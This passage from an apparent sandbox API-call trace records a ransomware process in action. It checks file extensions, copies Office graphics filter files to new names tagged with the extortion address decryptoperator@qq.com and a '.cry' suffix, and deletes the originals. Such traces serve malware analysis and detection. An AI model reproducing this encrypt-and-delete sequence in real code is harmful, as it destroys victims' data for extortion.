lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0051.816] lstrlenW (lpString=".ppt") returned 4 [0051.816] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.816] lstrlenW (lpString=".zip") returned 4 [0051.816] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.816] lstrlenW (lpString=".rar") returned 4 [0051.816] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.816] lstrlenW (lpString=".bz2") returned 4 [0051.816] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.816] lstrlenW (lpString=".7z") returned 3 [0051.816] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.816] lstrlenW (lpString=".dbf") returned 4 [0051.816] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.816] lstrlenW (lpString=".1cd") returned 4 [0051.816] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.817] lstrlenW (lpString=".jpg") returned 4 [0051.817] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.817] lstrlenW (lpString=".doc") returned 4 [0051.817] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.817] lstrlenW (lpString=".docx") returned 5 [0051.817] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0051.817] lstrlenW (lpString=".pdf") returned 4 [0051.817] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.817] lstrlenW (lpString=".xls") returned 4 [0051.817] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.817] lstrlenW (lpString=".xlsx") returned 5 [0051.817] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0051.817] lstrlenW (lpString=".ppt") returned 4 [0051.817] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.817] lstrlenW (lpString=".zip") returned 4 [0051.817] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.817] lstrlenW (lpString=".rar") returned 4 [0051.817] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.817] lstrlenW (lpString=".bz2") returned 4 [0051.817] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.817] lstrlenW (lpString=".7z") returned 3 [0051.817] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.817] lstrlenW (lpString=".dbf") returned 4 [0051.817] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.817] lstrlenW (lpString=".1cd") returned 4 [0051.817] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.817] lstrlenW (lpString=".jpg") returned 4 [0051.817] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.818] lstrcmpiW (lpString1=".FLT", lpString2=".cry") returned 1 [0051.818] lstrlenW (lpString="CGMIMP32.FLT") returned 12 [0051.818] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.822] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=323936) returned 1 [0051.822] CloseHandle (hObject=0x21c) returned 1 [0051.822] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 0x20 [0051.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.823] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.823] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.823] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.823] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0051.823] GetLastError () returned 0x0 [0051.823] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x4f160, lpOverlapped=0x0) returned 1 [0051.973] WriteFile (in: hFile=0x1c0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x4f170, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x4f170, lpOverlapped=0x0) returned 1 [0051.979] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.979] WriteFile (in: hFile=0x1c0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.979] SetEndOfFile (hFile=0x1c0) returned 1 [0051.979] CloseHandle (hObject=0x1c0) returned 1 [0051.980] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.980] SetEndOfFile (hFile=0x21c) returned 1 [0051.982] CloseHandle (hObject=0x21c) returned 1 [0051.982] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.983] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 1 [0051.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.983] lstrlenW (lpString=".doc") returned 4 [0051.983] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0051.983] lstrlenW (lpString=".docx") returned 5 [0051.983] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0051.983] lstrlenW (lpString=".pdf") returned 4 [0051.983] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0051.983] lstrlenW (lpString=".xls") returned 4 [0051.984] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0051.984] lstrlenW (lpString=".xlsx") returned 5 [0051.984] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0051.984] lstrlenW (lpString=".ppt") returned 4 [0051.984] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0051.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.984] lstrlenW (lpString=".zip") returned 4 [0051.984] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0051.984] lstrlenW (lpString=".rar") returned 4 [0051.984] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0051.984] lstrlenW (lpString=".bz2") returned 4 [0051.984] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0051.984] lstrlenW (lpString=".7z") returned 3 [0051.984] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0051.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.984] lstrlenW (lpString=".dbf") returned 4 [0051.984] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0051.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.984] lstrlenW (lpString=".1cd") returned 4 [0051.984] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0051.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.984] lstrlenW (lpString=".jpg") returned 4 [0051.984] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0051.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.984] lstrlenW (lpString=".doc") returned 4 [0051.984] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0051.984] lstrlenW (lpString=".docx") returned 5 [0051.984] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0051.984] lstrlenW (lpString=".pdf") returned 4 [0051.984] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0051.984] lstrlenW (lpString=".xls") returned 4 [0051.984] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0051.985] lstrlenW (lpString=".xlsx") returned 5 [0051.985] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0051.985] lstrlenW (lpString=".ppt") returned 4 [0051.985] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0051.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.985] lstrlenW (lpString=".zip") returned 4 [0051.985] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0051.985] lstrlenW (lpString=".rar") returned 4 [0051.985] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0051.985] lstrlenW (lpString=".bz2") returned 4 [0051.985] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0051.985] lstrlenW (lpString=".7z") returned 3 [0051.985] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0051.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.985] lstrlenW (lpString=".dbf") returned 4 [0051.985] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0051.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.985] lstrlenW (lpString=".1cd") returned 4 [0051.985] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0051.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.985] lstrlenW (lpString=".jpg") returned 4 [0051.985] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0051.986] lstrcmpiW (lpString1=".FLT", lpString2=".cry") returned 1 [0051.986] lstrlenW (lpString="GIFIMP32.FLT") returned 12 [0051.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.987] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=320384) returned 1 [0051.987] CloseHandle (hObject=0x21c) returned 1 [0051.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 0x20 [0051.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.987] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.987] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.987] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.987] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0051.988] GetLastError () returned 0x0 [0051.988] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x4e380, lpOverlapped=0x0) returned 1 [0052.039] WriteFile (in: hFile=0x1c0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x4e390, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x4e390, lpOverlapped=0x0) returned 1 [0052.045] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.045] WriteFile (in: hFile=0x1c0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.045] SetEndOfFile (hFile=0x1c0) returned 1 [0052.045] CloseHandle (hObject=0x1c0) returned 1 [0052.045] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.045] SetEndOfFile (hFile=0x21c) returned 1 [0052.049] CloseHandle (hObject=0x21c) returned 1 [0052.049] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.049] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 1 [0052.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.049] lstrlenW (lpString=".doc") returned 4 [0052.049] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.049] lstrlenW (lpString=".docx") returned 5 [0052.049] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.049] lstrlenW (lpString=".pdf") returned 4 [0052.049] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.049] lstrlenW (lpString=".xls") returned 4 [0052.049] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.049] lstrlenW (lpString=".xlsx") returned 5 [0052.049] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.049] lstrlenW (lpString=".ppt") returned 4 [0052.049] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.049] lstrlenW (lpString=".zip") returned 4 [0052.050] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.050] lstrlenW (lpString=".rar") returned 4 [0052.050] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.050] lstrlenW (lpString=".bz2") returned 4 [0052.050] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.050] lstrlenW (lpString=".7z") returned 3 [0052.050] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.050] lstrlenW (lpString=".dbf") returned 4 [0052.050] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.050] lstrlenW (lpString=".1cd") returned 4 [0052.050] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.050] lstrlenW (lpString=".jpg") returned 4 [0052.050] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.050] lstrlenW (lpString=".doc") returned 4 [0052.050] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.050] lstrlenW (lpString=".docx") returned 5 [0052.050] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.050] lstrlenW (lpString=".pdf") returned 4 [0052.050] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.050] lstrlenW (lpString=".xls") returned 4 [0052.050] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.050] lstrlenW (lpString=".xlsx") returned 5 [0052.050] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.050] lstrlenW (lpString=".ppt") returned 4 [0052.050] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.050] lstrlenW (lpString=".zip") returned 4 [0052.050] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.050] lstrlenW (lpString=".rar") returned 4 [0052.050] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.050] lstrlenW (lpString=".bz2") returned 4 [0052.051] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.051] lstrlenW (lpString=".7z") returned 3 [0052.051] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.051] lstrlenW (lpString=".dbf") returned 4 [0052.051] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.051] lstrlenW (lpString=".1cd") returned 4 [0052.051] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0052.051] lstrlenW (lpString=".jpg") returned 4 [0052.051] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.051] lstrcmpiW (lpString1=".FLT", lpString2=".cry") returned 1 [0052.051] lstrlenW (lpString="JPEGIM32.FLT") returned 12 [0052.051] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.052] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=241024) returned 1 [0052.052] CloseHandle (hObject=0x21c) returned 1 [0052.052] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt")) returned 0x20 [0052.052] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.052] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.052] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.052] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.052] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0052.053] GetLastError () returned 0x0 [0052.053] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x3ad80, lpOverlapped=0x0) returned 1 [0052.080] WriteFile (in: hFile=0x1c0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x3ad90, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x3ad90, lpOverlapped=0x0) returned 1 [0052.085] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.085] WriteFile (in: hFile=0x1c0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.085] SetEndOfFile (hFile=0x1c0) returned 1 [0052.141] CloseHandle (hObject=0x1c0) returned 1 [0052.142] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.142] SetEndOfFile (hFile=0x21c) returned 1 [0052.144] CloseHandle (hObject=0x21c) returned 1 [0052.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.144] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt")) returned 1 [0052.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.144] lstrlenW (lpString=".doc") returned 4 [0052.144] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.144] lstrlenW (lpString=".docx") returned 5 [0052.144] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.144] lstrlenW (lpString=".pdf") returned 4 [0052.144] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.145] lstrlenW (lpString=".xls") returned 4 [0052.145] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.145] lstrlenW (lpString=".xlsx") returned 5 [0052.145] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.145] lstrlenW (lpString=".ppt") returned 4 [0052.145] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.145] lstrlenW (lpString=".zip") returned 4 [0052.145] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.145] lstrlenW (lpString=".rar") returned 4 [0052.145] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 